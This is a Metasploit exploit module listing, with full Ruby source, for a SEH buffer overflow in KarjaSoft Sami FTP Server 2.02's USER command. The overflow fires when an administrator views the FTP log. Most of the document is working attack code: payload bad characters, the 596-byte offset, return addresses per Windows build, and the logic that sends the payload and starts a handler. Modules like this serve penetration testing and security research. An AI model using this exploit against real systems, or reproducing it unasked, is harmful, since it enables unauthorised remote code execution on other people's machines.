KarjaSoft Sami FTP Server v2.02 USER Overflow

2008-03-17T14:23:01
ID MSF:EXPLOIT/WINDOWS/FTP/SAMI_FTPD_USER
Type metasploit
Reporter Rapid7
Modified 2017-11-08T16:00:24

Description

This module exploits KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The string is recorded in the server's FTP log, and the stack is only overwritten when an administrator views that log; the exploit is therefore passive and requires end-user interaction, which should be kept in mind when selecting a payload (the handler must stay up until the log is viewed). Because the malicious entry remains in the log file, the server re-executes the exploit after a restart until the log file is manually deleted via the file system, so the file must be cleaned up after testing.

                                        
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

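class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Module metadata for the Sami FTP Server 2.02 USER overflow.
  #
  # The module is passive (Stance::Passive): the oversized USER string is only
  # logged by the server, and the overflow fires later, when an administrator
  # views the FTP log. Nothing here can trigger the payload on demand, so the
  # payload handler must stay up until the log is viewed, and the planted log
  # entry must be cleaned up afterwards (see #exploit).
  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',
      'Description'	=> %q{
          This module exploits the KarjaSoft Sami FTP Server version 2.02
        by sending an excessively long USER string. The stack is overwritten
        when the administrator attempts to view the FTP logs. Therefore, this exploit
        is passive and requires end-user interaction. Keep this in mind when selecting
        payloads. When the server is restarted, it will re-execute the exploit until
        the logfile is manually deleted via the file system.
      },
      'Author'	=> [ 'aushack' ],
      'Arch'		=> [ ARCH_X86 ],
      'License'	=> MSF_LICENSE,
      'Stance'	=> Msf::Exploit::Stance::Passive,
      'References'	=>
        [
          # This exploit appears to have been reported multiple times.
          [ 'CVE', '2006-0441'],
          [ 'CVE', '2006-2212'],
          [ 'OSVDB', '25670'],
          [ 'BID', '16370'],
          [ 'BID', '22045'],
          [ 'BID', '17835'],
          [ 'EDB', '1448'],
          [ 'EDB', '1452'],
          [ 'EDB', '1462'],
          [ 'EDB', '3127'],
          [ 'EDB', '3140']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Platform' 	=> ['win'],
      # Not privileged: the payload runs in the context of whoever opens the
      # log viewer (an administrator, per the description), not as SYSTEM.
      'Privileged'	=> false,
      'Payload'	=>
        {
          # Maximum encoded payload size that fits after the SEH record.
          'Space'			=> 300,
          # NUL, LF, CR and space would terminate or split the USER argument
          # on the wire; 0xff is presumably mangled somewhere on the log path
          # (not verifiable from this module).
          'BadChars'		=> "\x00\x0a\x0d\x20\xff",
          # Move ESP away from the overflow area so the decoder stub does not
          # overwrite the payload it is decoding.
          'StackAdjustment'	=> -3500,
        },
      # Each target is a pop/pop/ret in ws2help.dll, which differs per OS and
      # language build; these are pre-ASLR systems only.
      'Targets' 	=>
        [
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll
          [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll
          [ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll
          [ 'Windows XP SP0/1 - English',     { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll
        ],
      'DisclosureDate' => 'Jan 24 2006'))

    register_options(
      [
        Opt::RPORT(21),
      ])
  end

  # Banner-based version check.
  #
  # Returns CheckCode::Appears when the FTP greeting names
  # "Sami FTP Server 2.0.2", CheckCode::Unknown when no banner arrived within
  # the 3-second read (previously reported as Safe, which overstated what was
  # actually known), and CheckCode::Safe for any other banner. This is only a
  # banner match: a customised greeting hides a vulnerable server and a spoofed
  # one yields a false positive.
  def check
    connect
    begin
      banner = sock.get_once(-1, 3)
    ensure
      # Always release the socket, even if the read raises.
      disconnect
    end

    if banner.nil? || banner.empty?
      print_status("No banner received from #{peer}")
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears if banner =~ /Sami FTP Server 2\.0\.2/

    Exploit::CheckCode::Safe
  end

  # Plant the trigger.
  #
  # Sends "USER <596 filler bytes><SEH record + payload>\r\nPASS <c>\r\n".
  # The filler length is the offset to the SEH handler (taken from the
  # original research; not re-derived here). generate_seh_payload() emits the
  # SEH record pointing at target.ret followed by the encoded payload. The
  # login itself fails, which does not matter: the string is already in the
  # server's log. handler() is started before disconnecting so a reverse
  # payload has something to call back to once an administrator views the log.
  def exploit
    connect

    filler = Rex::Text.rand_text_alphanumeric(596)
    sploit = filler + generate_seh_payload(target.ret)

    # A random, badchar-free PASS argument keeps the exchange well formed;
    # its value is irrelevant.
    login = "USER #{sploit}\r\n"
    login << "PASS #{Rex::Text.rand_char(payload_badchars)}\r\n"

    print_status("Sending overflow to #{peer}; it executes only when an administrator views the FTP log")
    sock.put(login)

    # The malicious USER entry stays in the log file: per the module
    # description the server re-executes the exploit after a restart until
    # the log file is deleted from disk, so the operator must track it for
    # cleanup.
    print_warning("Payload persists in the server's FTP log until the log file is deleted; clean it up after testing")

    handler
    disconnect
  end
end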